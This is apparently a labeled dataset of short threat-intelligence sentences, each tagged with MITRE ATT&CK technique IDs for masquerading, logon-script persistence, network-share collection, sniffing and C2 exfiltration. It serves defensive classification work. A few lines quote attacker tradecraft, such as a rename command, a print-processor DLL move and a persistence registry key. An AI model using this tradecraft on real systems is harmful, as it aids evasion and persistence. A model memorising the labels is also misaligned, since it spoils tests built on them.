{"text1":"Lazarus Group has renamed system utilities such as \"wscript.exe\" and \"mshta.exe\".","labels":"['T1036.003']"}
{"text1":"The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.","labels":"['T1036.003']"}
{"text1":"A Lazarus Group custom backdoor implant included a custom PE loader named \"Security Package\" that was added into the lsass.exe process via registry key.","labels":"['T1036.004']"}
{"text1":"APT-C-36 has disguised its scheduled tasks as those used by Google.","labels":"['T1036.004']"}
{"text1":"APT29 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.","labels":"['T1036.004']"}
{"text1":"APT41 has created services to appear as benign system tools.","labels":"['T1036.004']"}
{"text1":"BITTER has disguised malware as a Windows Security update service.","labels":"['T1036.004']"}
{"text1":"Bazar can create a task named to appear benign.","labels":"['T1036.004']"}
{"text1":"CSPY Downloader has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.","labels":"['T1036.004']"}
{"text1":"Carbanak has copied legitimate service names to use for malicious services.","labels":"['T1036.004']"}
{"text1":"Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036.004']"}
{"text1":"ComRAT has used a task name associated with Windows SQM Consolidator.","labels":"['T1036.004']"}
{"text1":"Crutch has established persistence with a scheduled task impersonating the Outlook item finder.","labels":"['T1036.004']"}
{"text1":"DCSrv has masqueraded its service as a legitimate svchost.exe process.","labels":"['T1036.004']"}
{"text1":"Egregor has masqueraded the svchost.exe process to exfiltrate data.","labels":"['T1036.004']"}
{"text1":"FIN6 has renamed the \"psexec\" service name to \"mstdc\" to masquerade as a legitimate Windows service.","labels":"['T1036.004']"}
{"text1":"FIN7 has created a scheduled task named \u201cAdobeFlashSync\u201d to establish persistence.","labels":"['T1036.004']"}
{"text1":"FunnyDream has used a service named `WSearch` for execution.","labels":"['T1036.004']"}
{"text1":"Fysbis has masqueraded as the rsyncd and dbus-inotifier services.","labels":"['T1036.004']"}
{"text1":"GoldMax has impersonated systems management software to avoid detection.","labels":"['T1036.004']"}
{"text1":"Green Lambert has created a new executable named `Software Update Check` to appear legitimate.","labels":"['T1036.004']"}
{"text1":"Heyoka Backdoor has been named `srvdll.dll` to appear as a legitimate service.","labels":"['T1036.004']"}
{"text1":"Higaisa named a shellcode loader binary \"svchast.exe\" to spoof the legitimate \"svchost.exe\".","labels":"['T1036.004']"}
{"text1":"Hildegard has disguised itself as a known Linux process.","labels":"['T1036.004']"}
{"text1":"In one instance, menuPass added PlugX as a service with a display name of \"Corel Writing Tools Utility.\"","labels":"['T1036.004']"}
{"text1":"IronNetInjector has been disguised as a legitimate service using the name PythonUpdateSrvc.","labels":"['T1036.004']"}
{"text1":"KillDisk registers as a service under the Plug-And-Play Support name.","labels":"['T1036.004']"}
{"text1":"Kimsuky has disguised services to appear as benign software or related to operating system functions.","labels":"['T1036.004']"}
{"text1":"Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.","labels":"['T1036.004']"}
{"text1":"Naikon renamed a malicious service \"taskmgr\" to appear to be a legitimate version of Task Manager.","labels":"['T1036.004']"}
{"text1":"Nebulae has created a service named \"Windows Update Agent1\" to appear legitimate.","labels":"['T1036.004']"}
{"text1":"OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.","labels":"['T1036.004']"}
{"text1":"Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.","labels":"['T1036.004']"}
{"text1":"POWERSTATS has created a scheduled task named \"MicrosoftEdge\" to establish persistence.","labels":"['T1036.004']"}
{"text1":"PROMETHIUM has named services to appear legitimate.","labels":"['T1036.004']"}
{"text1":"PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`,  and `Onedrive` to evade detection.","labels":"['T1036.004']"}
{"text1":"SUGARDUMP's scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.","labels":"['T1036.004']"}
{"text1":"Seasalt has masqueraded as a service called \"SaSaut\" with a display name of \"System Authorization Service\" in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036.004']"}
{"text1":"Shamoon creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"","labels":"['T1036.004']"}
{"text1":"ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems.","labels":"['T1036.004']"}
{"text1":"Tarrask creates a scheduled task called \u201cWinUpdate\u201d to re-establish any dropped  C2 connections.","labels":"['T1036.004']"}
{"text1":"The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description \u201cWindows Check AV\u201d in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036.004']"}
{"text1":"To establish persistence, Truvasys adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager.","labels":"['T1036.004']"}
{"text1":"UNC2452 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.","labels":"['T1036.004']"}
{"text1":"Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries.","labels":"['T1036.004']"}
{"text1":"ZIRCONIUM has created a run key named \"Dropbox Update Setup\" to mask a persistence mechanism for a malicious binary.","labels":"['T1036.004']"}
{"text1":"ZxxZ has been disguised as a Windows security update service.","labels":"['T1036.004']"}
{"text1":"build_downer has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate.","labels":"['T1036.004']"}
{"text1":"A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.","labels":"['T1036.005']"}
{"text1":"APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.","labels":"['T1036.005']"}
{"text1":"APT29 renamed software and DLL's with legitimate names to appear benign.","labels":"['T1036.005']"}
{"text1":"APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.","labels":"['T1036.005']"}
{"text1":"AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.","labels":"['T1036.005']"}
{"text1":"BADNEWS attempts to hide its payloads using legitimate filenames.","labels":"['T1036.005']"}
{"text1":"BLINDINGCAN has attempted to hide its payload by using legitimate file names such as \"iconcache.db\".","labels":"['T1036.005']"}
{"text1":"BRONZE BUTLER has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.","labels":"['T1036.005']"}
{"text1":"BackdoorDiplomacy has dropped implants in folders named for legitimate software.","labels":"['T1036.005']"}
{"text1":"Bad Rabbit has masqueraded as a Flash Player installer through the executable file \"install_flash_player.exe\".","labels":"['T1036.005']"}
{"text1":"Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.","labels":"['T1036.005']"}
{"text1":"Bumblebee has named component DLLs \"RapportGP.dll\" to match those used by the security company Trusteer.","labels":"['T1036.005']"}
{"text1":"Bundlore has disguised a malicious .app file as a Flash Player update.","labels":"['T1036.005']"}
{"text1":"Carbanak has named malware \"svchost.exe,\" which is the name of the Windows shared service host program.","labels":"['T1036.005']"}
{"text1":"Carberp has masqueraded as Windows system file names, as well as \"chkntfs.exe\" and \"syscron.exe\".","labels":"['T1036.005']"}
{"text1":"ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).","labels":"['T1036.005']"}
{"text1":"Chaes has used an unsigned, crafted DLL module named \"hha.dll\" that was designed to look like a legitimate 32-bit Windows DLL.","labels":"['T1036.005']"}
{"text1":"Cuba has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.","labels":"['T1036.005']"}
{"text1":"DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.","labels":"['T1036.005']"}
{"text1":"DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.","labels":"['T1036.005']"}
{"text1":"Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool.","labels":"['T1036.005']"}
{"text1":"During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.","labels":"['T1036.005']"}
{"text1":"During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.","labels":"['T1036.005']"}
{"text1":"During Operation Sharpshooter, threat actors installed Rising Sun in the Startup folder and disguised it as `mssync.exe`.","labels":"['T1036.005']"}
{"text1":"During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs.","labels":"['T1036.005']"}
{"text1":"Earth Lusca used the command `move [file path] c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.","labels":"['T1036.005']"}
{"text1":"FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.","labels":"['T1036.005']"}
{"text1":"Felismus has masqueraded as legitimate Adobe Content Management System files.","labels":"['T1036.005']"}
{"text1":"Ferocious Kitten has named malicious files \"update.exe\" and loaded them into the compromise host's \u201cPublic\u201d folder.","labels":"['T1036.005']"}
{"text1":"FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.","labels":"['T1036.005']"}
{"text1":"FoggyWeb can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, FoggyWeb's loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file.","labels":"['T1036.005']"}
{"text1":"Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.","labels":"['T1036.005']"}
{"text1":"Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier.","labels":"['T1036.005']"}
{"text1":"Gamaredon Group has used legitimate process names to hide malware including \"svchosst\".","labels":"['T1036.005']"}
{"text1":"Gelsemium has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value \"Chrome Update\" to appear legitimate.","labels":"['T1036.005']"}
{"text1":"GoldenSpy's setup file installs initial executables under the folder \"%WinDir%\\System32\\PluginManager\".","labels":"['T1036.005']"}
{"text1":"Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.","labels":"['T1036.005']"}
{"text1":"Grandoreiro has named malicious browser extensions and update files to appear legitimate.","labels":"['T1036.005']"}
{"text1":"Green Lambert has been disguised as a Growl help file.","labels":"['T1036.005']"}
{"text1":"HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.","labels":"['T1036.005']"}
{"text1":"HermeticWiper has used the name `postgressql.exe` to mask a malicious payload.","labels":"['T1036.005']"}
{"text1":"HermeticWizard has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.","labels":"['T1036.005']"}
{"text1":"IceApple .NET assemblies have used `App_Web_` in their file names to appear legitimate.","labels":"['T1036.005']"}
{"text1":"If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.","labels":"['T1036.005']"}
{"text1":"Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.","labels":"['T1036.005']"}
{"text1":"InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.","labels":"['T1036.005']"}
{"text1":"InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.","labels":"['T1036.005']"}
{"text1":"KGH_SPY has masqueraded as a legitimate Windows tool.","labels":"['T1036.005']"}
{"text1":"KONNI has created a shortcut called \"Anti virus service.lnk\" in an apparent attempt to masquerade as a legitimate file.","labels":"['T1036.005']"}
{"text1":"Ke3chang has dropped their malware into legitimate installed software paths including: `C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`, `C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitRdr64.exe`, `C:\\Program Files (x86)\\Adobe\\Flash Player\\AddIns\\airappinstaller\\airappinstall.exe`, and `C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd64.exe`.","labels":"['T1036.005']"}
{"text1":"Kimsuky has renamed malware to legitimate names such as \"ESTCommon.dll\" or \"patch.dll\".","labels":"['T1036.005']"}
{"text1":"Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.","labels":"['T1036.005']"}
{"text1":"LookBack has a C2 proxy tool that masquerades as \"GUP.exe\", which is software used by Notepad++.","labels":"['T1036.005']"}
{"text1":"MCMD has been named Readme.txt to appear legitimate.","labels":"['T1036.005']"}
{"text1":"Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.","labels":"['T1036.005']"}
{"text1":"Machete's Machete MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.","labels":"['T1036.005']"}
{"text1":"MarkiRAT can masquerade as \"update.exe\" and \"svehost.exe\"; it has also mimicked legitimate Telegram and Chrome files.","labels":"['T1036.005']"}
{"text1":"MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.","labels":"['T1036.005']"}
{"text1":"Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.","labels":"['T1036.005']"}
{"text1":"Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","labels":"['T1036.005']"}
{"text1":"MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.","labels":"['T1036.005']"}
{"text1":"Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload.","labels":"['T1036.005']"}
{"text1":"Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables.","labels":"['T1036.005']"}
{"text1":"Nebulae uses functions named \"StartUserModeBrowserInjection\" and \"StopUserModeBrowserInjection\" indicating that it's trying to imitate chrome_frame_helper.dll.","labels":"['T1036.005']"}
{"text1":"OLDBAIT installs itself in \"%ALLUSERPROFILE%\\\\Application Data\\Microsoft\\MediaPlayer\\updatewindws.exe\"; the directory name is missing a space and the file name is missing the letter \"o.\"","labels":"['T1036.005']"}
{"text1":"OSX\/Shlayer can masquerade as a Flash Player update.","labels":"['T1036.005']"}
{"text1":"Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger.","labels":"['T1036.005']"}
{"text1":"One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.","labels":"['T1036.005']"}
{"text1":"OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in \"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\\"; the malicious file by the same name is saved in \"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\\".","labels":"['T1036.005']"}
{"text1":"PUNCHBUGGY mimics filenames from %SYSTEM%\\System32 to hide DLLs in %WINDIR% and\/or %TEMP%.","labels":"['T1036.005']"}
{"text1":"Patchwork installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as \u201cNet Monitor.\" They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe.","labels":"['T1036.005']"}
{"text1":"PcShare has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.","labels":"['T1036.005']"}
{"text1":"Penquin has mimicked the Cron binary to hide itself on compromised systems.","labels":"['T1036.005']"}
{"text1":"PlugX has been disguised as legitimate Adobe and PotPlayer files.","labels":"['T1036.005']"}
{"text1":"Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense.","labels":"['T1036.005']"}
{"text1":"Pysa has executed a malicious executable by naming it svchost.exe.","labels":"['T1036.005']"}
{"text1":"QUADAGENT used the PowerShell filenames \"Office365DCOMCheck.ps1\" and \"SystemDiskClean.ps1\".","labels":"['T1036.005']"}
{"text1":"RDAT has masqueraded as VMware.exe.","labels":"['T1036.005']"}
{"text1":"REvil can mimic the names of known executables.","labels":"['T1036.005']"}
{"text1":"Raindrop was installed under names that resembled legitimate Windows file and directory names.","labels":"['T1036.005']"}
{"text1":"RainyDay has used names to mimic legitimate software including \"vmtoolsd.exe\" to spoof Vmtools.","labels":"['T1036.005']"}
{"text1":"Rocke has used shell scripts which download mining executables and saves them with the filename \"java\".","labels":"['T1036.005']"}
{"text1":"Ryuk has constructed legitimate appearing installation folder paths by calling \"GetWindowsDirectoryW\" and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as \"C:\\Users\\Public\".","labels":"['T1036.005']"}
{"text1":"S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","labels":"['T1036.005']"}
{"text1":"SLOTHFULMEDIA has mimicked the names of known executables, such as mediaplayer.exe.","labels":"['T1036.005']"}
{"text1":"SUGARDUMP has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable.","labels":"['T1036.005']"}
{"text1":"SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities.","labels":"['T1036.005']"}
{"text1":"SUNSPOT was identified on disk with a filename of \"taskhostsvc.exe\" and it created an encrypted log file at \"C:\\Windows\\Temp\\vmware-vmdmp.log\".","labels":"['T1036.005']"}
{"text1":"Saint Bot has been disguised as a legitimate executable, including as Windows SDK.","labels":"['T1036.005']"}
{"text1":"Sandworm Team has avoided detection by naming a malicious binary explorer.exe.","labels":"['T1036.005']"}
{"text1":"Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.","labels":"['T1036.005']"}
{"text1":"ShimRatReporter spoofed itself as \"AlphaZawgyl_font.exe\", a specialized Unicode font.","labels":"['T1036.005']"}
{"text1":"Sidewinder has named malicious files \"rekeywiz.exe\" to match the name of a legitimate Windows executable.","labels":"['T1036.005']"}
{"text1":"Skidmap has created a fake \"rm\" binary to replace the legitimate Linux binary.","labels":"['T1036.005']"}
{"text1":"Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory \"CSIDL_APPDATA\\microsoft\\security\".","labels":"['T1036.005']"}
{"text1":"StrongPity has been bundled with legitimate software installation files for disguise.","labels":"['T1036.005']"}
{"text1":"TEMP.Veles has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.","labels":"['T1036.005']"}
{"text1":"TRITON disguised itself as the legitimate Triconex Trilog application.","labels":"['T1036.005']"}
{"text1":"Tarrask has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`.","labels":"['T1036.005']"}
{"text1":"TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.","labels":"['T1036.005']"}
{"text1":"The Bazar loader has named malicious shortcuts \"adobe\" and mimicked communications software.","labels":"['T1036.005']"}
{"text1":"The TAINTEDSCRIBE main executable has disguised itself as Microsoft\u2019s Narrator.","labels":"['T1036.005']"}
{"text1":"The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by APT1 as a name for malware.","labels":"['T1036.005']"}
{"text1":"ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.","labels":"['T1036.005']"}
{"text1":"ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc.","labels":"['T1036.005']"}
{"text1":"TinyTurla has been deployed as `w64time.dll` to appear legitimate.","labels":"['T1036.005']"}
{"text1":"To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.","labels":"['T1036.005', 'T1547.001', 'T1547.009']"}
{"text1":"Tropic Trooper has hidden payloads in Flash directories and fake installer files.","labels":"['T1036.005']"}
{"text1":"USBStealer mimics a legitimate Russian program called USB Disk Security.","labels":"['T1036.005']"}
{"text1":"Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.","labels":"['T1036.005']"}
{"text1":"WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.","labels":"['T1036.005']"}
{"text1":"ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.","labels":"['T1036.005']"}
{"text1":"admin@338 actors used the following command to rename one of their tools to a benign file name: \"ren \"%temp%\\upload\" audiodg.exe\"","labels":"['T1036.005']"}
{"text1":"menuPass has been seen changing malicious files to appear legitimate.","labels":"['T1036.005']"}
{"text1":"Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.","labels":"['T1036.006']"}
{"text1":"The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe.","labels":"['T1036.007']"}
{"text1":"An APT28 loader Trojan adds the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\" to establish persistence.","labels":"['T1037.001']"}
{"text1":"Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \".","labels":"['T1037.001']"}
{"text1":"Cobalt Group has added persistence by registering the file name for the next stage malware under \"HKCU\\Environment\\UserInitMprLogonScript\".","labels":"['T1037.001']"}
{"text1":"KGH_SPY has the ability to set the \"HKCU\\Environment\\UserInitMprLogonScript\" Registry key to execute logon scripts.","labels":"['T1037.001']"}
{"text1":"Zebrocy performs persistence with a logon script via adding to the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\".","labels":"['T1037.001']"}
{"text1":"Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled.","labels":"['T1037.004']"}
{"text1":"Green Lambert can add \"init.d\" and \"rc.d\" files in the \"\/etc\" folder to establish persistence.","labels":"['T1037.004']"}
{"text1":"jRAT can list and manage startup entries.","labels":"['T1037.005']"}
{"text1":"APT28 has collected files from network shared drives.","labels":"['T1039']"}
{"text1":"Chimera has collected data of interest from network shares.","labels":"['T1039']"}
{"text1":"CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list.","labels":"['T1039']"}
{"text1":"Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.","labels":"['T1039']"}
{"text1":"Fox Kitten has searched network shares to access sensitive documents.","labels":"['T1039']"}
{"text1":"Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.","labels":"['T1039']"}
{"text1":"Ramsay can collect data from network drives and stage it for exfiltration.","labels":"['T1039']"}
{"text1":"Sowbug extracted Word documents from a file server on a victim network.","labels":"['T1039']"}
{"text1":"When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","labels":"['T1039']"}
{"text1":"menuPass has collected data from remote systems by mounting network shares with \"net use\" and using Robocopy to transfer data.","labels":"['T1039']"}
{"text1":"APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.","labels":"['T1040']"}
{"text1":"DarkVishnya used network sniffing to obtain login data.","labels":"['T1040']"}
{"text1":"Emotet has been observed to hook network APIs to monitor network traffic.","labels":"['T1040']"}
{"text1":"Empire can be used to conduct packet captures on target hosts.","labels":"['T1040']"}
{"text1":"FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet\/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.","labels":"['T1040']"}
{"text1":"Impacket can be used to sniff network traffic via an interface or raw socket.","labels":"['T1040']"}
{"text1":"MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.","labels":"['T1040']"}
{"text1":"NBTscan can dump and print whole packet content.","labels":"['T1040']"}
{"text1":"Penquin can sniff network traffic to look for packets matching specific conditions.","labels":"['T1040']"}
{"text1":"PoshC2 contains a module for taking packet captures on compromised hosts.","labels":"['T1040']"}
{"text1":"Responder captures hashes and credentials that are sent to the system after the name services have been poisoned.","labels":"['T1040']"}
{"text1":"Sandworm Team has used intercepter-NG to sniff passwords in network traffic.","labels":"['T1040']"}
{"text1":"A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.","labels":"['T1041']"}
{"text1":"APT3 has a tool that exfiltrates data over the C2 channel.","labels":"['T1041']"}
{"text1":"APT32's backdoor has exfiltrated data using the already opened channel with its C&C server.","labels":"['T1041']"}
{"text1":"APT39 has exfiltrated stolen victim data through C2 communications.","labels":"['T1041']"}
{"text1":"Adversaries can direct BACKSPACE to upload files to the C2 Server.","labels":"['T1041']"}
{"text1":"AppleJeus has exfiltrated collected host information to a C2 server.","labels":"['T1041']"}
{"text1":"Astaroth exfiltrates collected information from its r1.log file to the external C2 server.","labels":"['T1041']"}
{"text1":"Attor has exfiltrated data over the C2 channel.","labels":"['T1041']"}
{"text1":"AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.","labels":"['T1041']"}
{"text1":"BLUELIGHT has exfiltrated data over its C2 channel.","labels":"['T1041']"}
{"text1":"Bandook can upload files from a victim's machine over the C2 channel.","labels":"['T1041']"}
{"text1":"Bankshot exfiltrates data over its C2 channel.","labels":"['T1041']"}
{"text1":"Bisonal has added the exfiltrated data to the URL over the C2 channel.","labels":"['T1041']"}
{"text1":"Bumblebee can send collected data in JSON format to C2.","labels":"['T1041']"}
{"text1":"CallMe exfiltrates data to its C2 server over the same protocol as C2 communications.","labels":"['T1041']"}
{"text1":"Cannon exfiltrates collected data over email via SMTP\/S and POP3\/S C2 channels.","labels":"['T1041']"}
{"text1":"Caterpillar WebShell can upload files over the C2 channel.","labels":"['T1041']"}
{"text1":"CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.","labels":"['T1041']"}
{"text1":"Chimera has used Cobalt Strike C2 beacons for data exfiltration.","labels":"['T1041']"}
{"text1":"CreepySnail can connect to C2 for data exfiltration.","labels":"['T1041']"}
{"text1":"Crimson can exfiltrate stolen information over its C2.","labels":"['T1041']"}
{"text1":"Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API).","labels":"['T1041']"}
{"text1":"Cyclops Blink has the ability to upload exfiltrated files to a C2 server.","labels":"['T1041']"}
{"text1":"Data exfiltration is done by Okrum using the already opened channel with the C2 server.","labels":"['T1041']"}
{"text1":"DnsSystem can exfiltrate collected data to its C2 server.","labels":"['T1041']"}
{"text1":"Doki has used Ngrok to establish C2 and exfiltrate data.","labels":"['T1041']"}
{"text1":"Drovorub can exfiltrate files over C2 infrastructure.","labels":"['T1041']"}
{"text1":"During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.","labels":"['T1041']"}
{"text1":"During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.","labels":"['T1041']"}
{"text1":"DustySky has exfiltrated data to the C2 server.","labels":"['T1041']"}
{"text1":"Dyre has the ability to send information staged on a compromised host externally to C2.","labels":"['T1041']"}
{"text1":"Ebury can exfiltrate SSH credentials through custom DNS queries.","labels":"['T1041']"}
{"text1":"Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers.","labels":"['T1041']"}
{"text1":"Flagpro has exfiltrated data to the C2 server.","labels":"['T1041']"}
{"text1":"FlawedAmmyy has sent data collected from a compromised host to its C2 servers.","labels":"['T1041']"}
{"text1":"FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server.","labels":"['T1041']"}
{"text1":"FunnyDream can execute commands, including gathering user information, and send the results to C2.","labels":"['T1041']"}
{"text1":"GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data.","labels":"['T1041']"}
{"text1":"Grandoreiro can send data it retrieves to the C2 server.","labels":"['T1041']"}
{"text1":"GrimAgent has sent data related to a compromise host over its C2 channel.","labels":"['T1041']"}
{"text1":"HOPLIGHT has used its C2 channel to exfiltrate data.","labels":"['T1041']"}
{"text1":"Higaisa exfiltrated data over its C2 channel.","labels":"['T1041']"}
{"text1":"HotCroissant has the ability to download files from the infected host to the command and control (C2) server.","labels":"['T1041']"}
{"text1":"Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2.","labels":"['T1041']"}
{"text1":"Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.","labels":"['T1041']"}
{"text1":"KGH_SPY can exfiltrate collected information from the host to the C2 server.","labels":"['T1041']"}
{"text1":"KONNI has sent data and files to its C2 server.","labels":"['T1041']"}
{"text1":"Kessel has exfiltrated information gathered from the infected system to the C2 server.","labels":"['T1041']"}
{"text1":"Kimsuky has exfiltrated data over its C2 channel.","labels":"['T1041']"}
{"text1":"Leviathan has exfiltrated data over its C2 channel.","labels":"['T1041']"}
{"text1":"LightNeuron exfiltrates data over its email C2 channel.","labels":"['T1041']"}
{"text1":"LitePower can send collected data, including screenshots, over its C2 channel.","labels":"['T1041']"}
{"text1":"MacMa exfiltrates data from a supplied path over its C2 channel.","labels":"['T1041']"}
{"text1":"Machete's collected data is exfiltrated over the same channel used for C2.","labels":"['T1041']"}
{"text1":"MarkiRAT can exfiltrate locally stored data via its C2.","labels":"['T1041']"}
{"text1":"MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2.","labels":"['T1041']"}
